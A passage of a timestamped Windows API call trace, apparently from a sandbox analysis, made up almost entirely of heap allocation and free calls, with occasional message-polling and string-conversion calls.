(HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0172.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0172.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0172.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0172.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0172.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0172.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0172.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0172.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0172.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0172.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0172.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0172.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0172.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0172.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0172.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0172.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0172.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0172.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0172.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0172.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0172.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0172.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0172.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0172.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0172.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0172.582] FreeLibrary (hLibModule=0x75990000) returned 1 [0172.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0172.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0172.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0172.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0172.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0172.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0172.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0172.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0172.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0172.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0172.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0172.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0172.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0172.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0172.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0172.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0172.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0172.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0172.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0172.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0172.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0172.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0172.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0172.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0172.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0172.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0172.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0172.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0172.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0172.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0172.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0172.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0172.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0172.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0172.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0172.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0172.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0172.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0172.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0172.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0172.584] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0172.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0172.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0172.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0172.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0172.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0172.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0172.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0172.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0172.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0172.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0172.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d4a0 [0172.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0172.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0172.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0172.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0172.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0172.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0172.585] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0172.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0172.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0172.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0172.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0172.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0172.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0172.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0172.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0172.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0172.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0172.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0172.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0172.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0172.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0172.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0172.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0172.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0172.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0172.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0172.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0172.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0172.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0172.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0172.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0172.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0172.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0172.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0172.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0172.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0172.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0172.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0172.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0172.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0172.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0172.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0172.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0172.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0172.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0172.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0172.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0172.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0172.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0172.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0172.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0172.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0172.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0172.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8edfa0 | out: hHeap=0x8a0000) returned 1 [0172.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0172.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0172.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0172.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0172.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0172.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0172.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0172.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0172.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0172.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0172.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0172.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0172.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0172.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0172.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0172.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0172.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0172.588] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0172.588] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0172.588] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0172.588] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0172.588] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0172.588] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0172.588] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0172.588] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0172.588] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0172.588] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0172.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0172.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0172.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0172.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0172.588] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0172.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0172.588] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0172.588] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0172.588] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0172.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0172.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e19f0 [0172.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0172.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0172.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0172.589] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0172.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1970 [0172.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0172.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0172.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0172.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0172.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0172.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0172.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc1c8 [0172.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0172.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0172.589] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0172.589] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0172.589] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0172.589] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc1c8 | out: hHeap=0x8a0000) returned 1 [0172.589] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0172.589] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0172.589] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0172.589] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0172.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b20 [0172.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0172.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0172.590] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0172.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1890 [0172.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0172.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba378 [0172.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0172.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0172.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0172.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0172.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0172.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0172.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0172.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0172.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0172.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0172.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0172.590] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0172.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0172.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0172.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0172.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0172.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0172.591] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0172.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0172.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0172.591] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0172.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0172.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0172.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0172.591] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0172.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0172.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0172.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0172.591] PeekMessageW (in: 